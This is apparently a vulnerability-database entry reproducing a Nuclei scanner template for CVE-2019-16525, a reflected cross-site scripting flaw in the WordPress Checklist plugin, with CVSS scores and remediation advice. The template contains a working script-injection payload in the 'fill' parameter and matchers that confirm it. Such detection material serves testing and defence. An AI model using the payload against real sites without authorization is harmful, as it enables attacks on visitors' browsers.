Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-16525
HistoryJul 15, 2021 - 12:30 p.m.

WordPress Checklist <1.1.9 - Cross-Site Scripting

2021-07-1512:30:44
ProjectDiscovery
github.com
6
cve
cve2019
xss
wp-plugin
packetstorm
wordpress
checklist
cross-site scripting
data theft
unauthorized actions
update

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

69.4%

WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.

id: CVE-2019-16525

info:
  name: WordPress Checklist <1.1.9 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
  impact: |
    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress Checklist plugin (1.1.9 or higher) to mitigate this vulnerability.
  reference:
    - https://wordpress.org/plugins/checklist/#developers
    - https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
    - https://plugins.trac.wordpress.org/changeset/2155029/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
    - https://wpvulndb.com/vulnerabilities/9877
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-16525
    cwe-id: CWE-79
    epss-score: 0.00323
    epss-percentile: 0.67586
    cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: checklist
    product: checklist
    framework: wordpress
  tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/checklist/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Checklist'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220010bb873f36ec413a0d70d60a2c0bc31c520e0c549a3f4aa0930e9596f8fdd1e02205293c4a5430acf4d8bc891f5b50f432899d3cf35cc6bf32558669d1de9508982:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

69.4%

Related for NUCLEI:CVE-2019-16525